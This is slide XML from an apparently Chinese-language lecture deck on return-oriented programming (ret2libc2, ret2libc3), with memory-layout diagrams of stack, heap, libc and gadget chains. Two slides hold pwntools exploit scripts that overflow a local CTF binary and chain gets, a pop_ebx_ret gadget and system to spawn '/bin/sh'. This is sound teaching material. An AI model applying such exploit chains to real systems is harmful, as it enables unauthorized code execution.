            <a:cxnSpLocks/>
            <a:endCxn id="21" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10514588" y="3010915"/>
            <a:ext cx="474578" cy="0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文本框 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53875BE4-F753-48AB-B2FB-D393F8BBEE01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11102045" y="2784110"/>
            <a:ext cx="858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Libc</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="文本框 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8C9A344-EC85-4111-8599-9A72C59B0E4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11102389" y="5545729"/>
            <a:ext cx="858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Text</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0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D1FFE461-B8E4-4C17-A1A3-67FF7C4A0306}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1345198" y="1851470"/>
            <a:ext cx="336604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from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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pwn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import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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io = process("./ret2libc2")</a:t>
            </a:r>
          </a:p>
          <a:p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buf2 = 0x0804A080</a:t>
            </a:r>
          </a:p>
          <a:p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system = 0x08048490</a:t>
            </a:r>
          </a:p>
          <a:p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gets = 0x08048460</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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payload = flat([</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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b'A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'*112, gets, system, buf2, buf2])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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io.sendline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(payload)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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io.sendline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(b'/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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sh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\x00')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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io.interactive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()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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48E567E0-7103-4116-BA78-1A8F51CB386D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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ret2libc2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="387385214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6F542C06-4F84-45F8-A155-C9C1CA996953}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6631564" y="589958"/>
            <a:ext cx="3883027" cy="6061957"/>
            <a:chOff x="4584869" y="992499"/>
            <a:chExt cx="5738979" cy="5436216"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="Shape 624">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A8DC2CD-6D8B-473D-BD39-E56AFEDCFDC5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4584869" y="992499"/>
              <a:ext cx="5738977" cy="5436216"/>
              <a:chOff x="4897548" y="888136"/>
              <a:chExt cx="1363202" cy="3513619"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Shape 625">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{529DE509-C2E4-44BB-8BE6-C481AF3FA52E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="888136"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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rgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>For Kernel</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Shape 626">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F13D3A9-59E1-48B7-B88F-AFA6E52583E9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897548" y="1162600"/>
                <a:ext cx="1363200" cy="532702"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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" name="Shape 627">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9D023FC-2D0D-4160-AE9D-3A16DB1F7623}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1695037"/>
                <a:ext cx="1363200" cy="345399"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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" name="Shape 628">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EC5BF3E-1C26-460D-BF4F-9870124E7288}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2040436"/>
                <a:ext cx="1363200" cy="442800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" name="Shape 629">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F78A3CD3-E481-4F8E-BA23-04776A31C3E4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2483236"/>
                <a:ext cx="1363200" cy="410861"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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Shape 630">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3C36562-15E1-44F3-A275-54744B61749F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2894098"/>
                <a:ext cx="1363200" cy="274195"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="D9EAD3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dirty="0"/>
                  <a:t>Heap</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Shape 631">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6286BDDF-878B-4830-8C97-41E0EAD0356C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897549" y="3331789"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="F4CCCC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dirty="0"/>
                  <a:t>Data</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Shape 632">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9282ED0-348A-430C-9614-46B78381CB83}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3607695"/>
                <a:ext cx="1363200" cy="519861"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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" name="Shape 633">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D40C47C8-3847-4696-ACE1-0EAF89E09DA4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897549" y="4127555"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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rgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Unused</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="15" name="Shape 634">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FDAEC4A-0225-4A8A-BE4B-B55D902BD42D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="8" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5579150" y="1695037"/>
                <a:ext cx="0" cy="109299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16" name="Shape 635">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B83DCF5A-918C-4F83-A5BF-9C91701057AB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="11" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="5579150" y="2559899"/>
                <a:ext cx="4460" cy="334199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</p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Shape 631">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E991AC80-276A-4219-AB15-7858AE929F7C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4584879" y="1844876"/>
              <a:ext cx="5738969" cy="251142"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E4808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zh-CN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ret_addr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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= </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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gadget_addr</a:t>
              </a:r>
              <a:endParaRPr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17" name="文本框 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687AF02C-0789-432C-A9DB-7FED09A1EB89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10672628" y="1208198"/>
            <a:ext cx="858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Stack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="连接符: 肘形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22E0522E-454E-4538-B2E5-F09C06D10F87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="1"/>
            <a:endCxn id="28" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6631567" y="1680473"/>
            <a:ext cx="5" cy="4317113"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4572100000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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hape 628">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{402A0AF2-2DF5-4833-A710-9AE68DA39E2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631570" y="4525879"/>
            <a:ext cx="3883021" cy="28005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Bss</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B214794-FBBA-4945-A292-0508CF388B3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631567" y="2870890"/>
            <a:ext cx="3883021" cy="280050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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system()</a:t>
            </a:r>
            <a:endParaRPr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6" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{205AB67C-501F-40F0-8689-F6517E7BED78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631566" y="5424639"/>
            <a:ext cx="3883021" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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gadget</a:t>
            </a:r>
            <a:endParaRPr sz="105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7" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA5398DD-AE7B-423E-8E84-8F2A8BAB8D0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631565" y="5687810"/>
            <a:ext cx="3883021" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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gadget</a:t>
            </a:r>
            <a:endParaRPr sz="105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8" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88E1BCE5-B970-4E1D-82FF-E1B7AD45DB53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631566" y="5929372"/>
            <a:ext cx="3883020" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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gadget</a:t>
            </a:r>
            <a:endParaRPr sz="105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30" name="连接符: 肘形 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2972708F-45F0-4F8E-98E0-FC2D921E34A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="28" idx="3"/>
            <a:endCxn id="26" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10514586" y="5492854"/>
            <a:ext cx="1" cy="504733"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 22860100000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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连接符 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96EAFB68-708F-4923-88DD-5E3D4754A336}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="26" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6156960" y="5492854"/>
            <a:ext cx="474606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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A878DC5F-61BF-447E-907F-4E64EBF7FBB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6156951" y="5492854"/>
            <a:ext cx="9" cy="262161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箭头连接符 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CE1A2E0-2A79-4732-A1CE-20006EBE7728}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="27" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6156951" y="5755015"/>
            <a:ext cx="474614" cy="1010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连接符 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CF40EE0-451A-4D1B-8223-CF358B34CEF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="27" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10514586" y="5756025"/>
            <a:ext cx="474606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连接符 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77ED6BB8-F57E-4314-B3FF-D518A5ABE6DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10989178" y="3010915"/>
            <a:ext cx="0" cy="2744427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箭头连接符 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17FFE878-B274-44B8-B580-E714AD5E7C63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="21" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10514588" y="3010915"/>
            <a:ext cx="474578" cy="0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文本框 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53875BE4-F753-48AB-B2FB-D393F8BBEE01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11102045" y="2784110"/>
            <a:ext cx="858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Libc</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="文本框 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8C9A344-EC85-4111-8599-9A72C59B0E4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11102389" y="5545729"/>
            <a:ext cx="858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Text</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0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D1FFE461-B8E4-4C17-A1A3-67FF7C4A0306}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="127879" y="1960888"/>
            <a:ext cx="644708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from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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pwn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import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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io = process("./ret2libc2")</a:t>
            </a:r>
          </a:p>
          <a:p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buf2 = 0x0804A080</a:t>
            </a:r>
          </a:p>
          <a:p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system = 0x08048490</a:t>
            </a:r>
          </a:p>
          <a:p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gets = 0x08048460</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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pop_ebx_ret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= 0x0804843d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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payload = flat([</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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b'A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'*112, gets, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1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pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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_ebx_ret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, buf2, system, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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pop_ebx_ret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, buf2])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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io.sendline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(payload)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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io.sendline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(b'/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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sh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\x00')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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io.interactive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()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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48E567E0-7103-4116-BA78-1A8F51CB386D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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ret2libc2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04AA57B-90E3-72ED-CA4E-3AF723D0160E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1311141"/>
            <a:ext cx="5935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每次用完后将参数弹出</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="410874762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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48E567E0-7103-4116-BA78-1A8F51CB386D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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ret2libc3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74E4D69A-B6AF-A2B6-DE19-4A19DBF54A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984" y="592353"/>
            <a:ext cx="4397121" cy="3680779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C668CF7A-E6F7-B92E-1BDE-6C4B7E8784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8344" y="2838480"/>
            <a:ext cx="3215919" cy="1097375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4A80CCF1-22DD-978E-020B-4B30C79A7967}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="366111" y="4287324"/>
